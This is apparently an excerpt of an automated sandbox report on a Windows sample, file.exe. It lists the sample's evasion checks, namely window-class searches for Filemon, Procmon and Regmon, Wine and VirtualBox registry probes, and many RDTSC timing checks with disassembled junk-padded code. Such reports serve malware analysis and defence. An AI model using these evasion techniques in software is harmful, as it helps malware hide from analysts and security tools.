          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9230F second address: D92313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92313 second address: D9231D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0820DCC6A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9231D second address: D92368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jne 00007F0821212AE6h 0x0000000d pop ecx 0x0000000e je 00007F0821212AF8h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F0821212AF0h 0x0000001b push ecx 0x0000001c jmp 00007F0821212AF3h 0x00000021 pop ecx 0x00000022 popad 0x00000023 jnc 00007F0821212AFCh 0x00000029 pushad 0x0000002a jl 00007F0821212AE6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92368 second address: D92370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9133D second address: D91363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0821212AF2h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0821212AECh 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91363 second address: D9136F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9136F second address: D91375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94280 second address: D94286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94286 second address: D942DD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jp 00007F0821212AF6h 0x00000010 jmp 00007F0821212AF0h 0x00000015 pop esi 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f js 00007F0821212AE8h 0x00000025 push esi 0x00000026 pop esi 0x00000027 popad 0x00000028 mov eax, dword ptr [eax] 0x0000002a pushad 0x0000002b push eax 0x0000002c pushad 0x0000002d popad 0x0000002e pop eax 0x0000002f jmp 00007F0821212AF3h 0x00000034 popad 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D942DD second address: D942E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94335 second address: D94354 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94354 second address: D94358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94358 second address: D943A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b mov ecx, dword ptr [ebp+122D2BFDh] 0x00000011 push 00000000h 0x00000013 call 00007F0821212AF5h 0x00000018 add esi, 57B14945h 0x0000001e pop ecx 0x0000001f push FCD4500Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0821212AEEh 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D943A6 second address: D94420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 032BB076h 0x00000010 jnl 00007F0820DCC6AAh 0x00000016 push 00000003h 0x00000018 add esi, dword ptr [ebp+122D18E4h] 0x0000001e push 00000000h 0x00000020 stc 0x00000021 jmp 00007F0820DCC6B4h 0x00000026 push 00000003h 0x00000028 mov ecx, dword ptr [ebp+122D2A2Dh] 0x0000002e call 00007F0820DCC6A9h 0x00000033 push esi 0x00000034 jne 00007F0820DCC6B1h 0x0000003a pop esi 0x0000003b push eax 0x0000003c jmp 00007F0820DCC6AAh 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 pushad 0x00000046 push ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94420 second address: D94428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94428 second address: D94484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a jne 00007F0820DCC6B6h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jnp 00007F0820DCC6B4h 0x0000001a pop eax 0x0000001b mov esi, dword ptr [ebp+122D29D1h] 0x00000021 lea ebx, dword ptr [ebp+1244B1DAh] 0x00000027 xchg eax, ebx 0x00000028 jmp 00007F0820DCC6B0h 0x0000002d push eax 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94484 second address: D94488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94505 second address: D9450B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9450B second address: D94522 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F0821212AF8h 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F0821212AE6h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94522 second address: D94526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94526 second address: D945F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or ecx, dword ptr [ebp+122D2ACDh] 0x0000000d push 00000000h 0x0000000f sub dword ptr [ebp+122D1BB2h], esi 0x00000015 call 00007F0821212AE9h 0x0000001a jmp 00007F0821212AECh 0x0000001f push eax 0x00000020 pushad 0x00000021 jl 00007F0821212AECh 0x00000027 jmp 00007F0821212AF5h 0x0000002c popad 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 push ecx 0x00000032 jmp 00007F0821212AF5h 0x00000037 pop ecx 0x00000038 mov eax, dword ptr [eax] 0x0000003a jmp 00007F0821212AF4h 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 jo 00007F0821212AF2h 0x00000049 jnc 00007F0821212AECh 0x0000004f pop eax 0x00000050 mov esi, dword ptr [ebp+122D2CDDh] 0x00000056 push 00000003h 0x00000058 movsx ecx, ax 0x0000005b push 00000000h 0x0000005d mov dword ptr [ebp+122D1EACh], ebx 0x00000063 mov edx, edi 0x00000065 push 00000003h 0x00000067 mov dx, ax 0x0000006a call 00007F0821212AE9h 0x0000006f jmp 00007F0821212AF2h 0x00000074 push eax 0x00000075 push esi 0x00000076 push eax 0x00000077 push edx 0x00000078 push ebx 0x00000079 pop ebx 0x0000007a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D945F7 second address: D9460C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0820DCC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9460C second address: D94616 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0821212AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6910 second address: DB6916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB47BF second address: DB47D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0821212AEBh 0x0000000c pop eax 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4972 second address: DB4978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4978 second address: DB49A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0821212AF6h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4C3F second address: DB4C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4C45 second address: DB4C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop esi 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4C55 second address: DB4C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4D96 second address: DB4D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4D9A second address: DB4DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0820DCC6AFh 0x0000000b push eax 0x0000000c jmp 00007F0820DCC6B8h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4F28 second address: DB4F4B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0821212AF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jl 00007F0821212AEEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5370 second address: DB5374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5374 second address: DB537A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB54F9 second address: DB54FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB54FD second address: DB5521 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0821212AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0821212AF1h 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F0821212AE6h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5829 second address: DB5840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0820DCC6AFh 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB59C3 second address: DB59C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC55D second address: DAC563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC563 second address: DAC588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F0821212AF4h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC588 second address: DAC5A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5B2E second address: DB5B40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F0821212AECh 0x0000000c js 00007F0821212AE6h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6094 second address: DB609D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB609D second address: DB60A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB63BE second address: DB63C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB63C6 second address: DB63D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB63D1 second address: DB63D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBD83F second address: DBD847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C9CE second address: D8C9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0820DCC6A6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F0820DCC6A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C9E3 second address: D8C9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C9E7 second address: D8C9EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AF04 second address: D8AF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3252 second address: DC326D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0820DCC6B5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC326D second address: DC3271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC33D8 second address: DC341C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F0820DCC6ADh 0x0000000b jmp 00007F0820DCC6AFh 0x00000010 popad 0x00000011 js 00007F0820DCC6B0h 0x00000017 jmp 00007F0820DCC6AAh 0x0000001c jmp 00007F0820DCC6AAh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC341C second address: DC3422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3422 second address: DC3426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3426 second address: DC343B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC343B second address: DC3444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3444 second address: DC3454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0821212AEBh 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC396D second address: DC399B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0820DCC6ABh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0820DCC6B6h 0x00000011 js 00007F0820DCC6A6h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC399B second address: DC39C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0821212AEAh 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC39C6 second address: DC39CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4522 second address: DC4526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4526 second address: DC452A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC452A second address: DC453B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC453B second address: DC4550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4550 second address: DC455E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0821212AEAh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC455E second address: DC45F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jmp 00007F0820DCC6B4h 0x00000010 push esi 0x00000011 jmp 00007F0820DCC6ACh 0x00000016 pop esi 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007F0820DCC6B1h 0x00000021 pop eax 0x00000022 mov edi, esi 0x00000024 call 00007F0820DCC6A9h 0x00000029 jne 00007F0820DCC6BBh 0x0000002f push eax 0x00000030 jmp 00007F0820DCC6AEh 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jmp 00007F0820DCC6ACh 0x0000003e mov eax, dword ptr [eax] 0x00000040 push eax 0x00000041 push edx 0x00000042 jo 00007F0820DCC6A8h 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC45F3 second address: DC45F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC472E second address: DC4733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4C16 second address: DC4C28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4C28 second address: DC4C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0820DCC6B3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC567F second address: DC5691 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F0821212AE8h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6755 second address: DC6759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
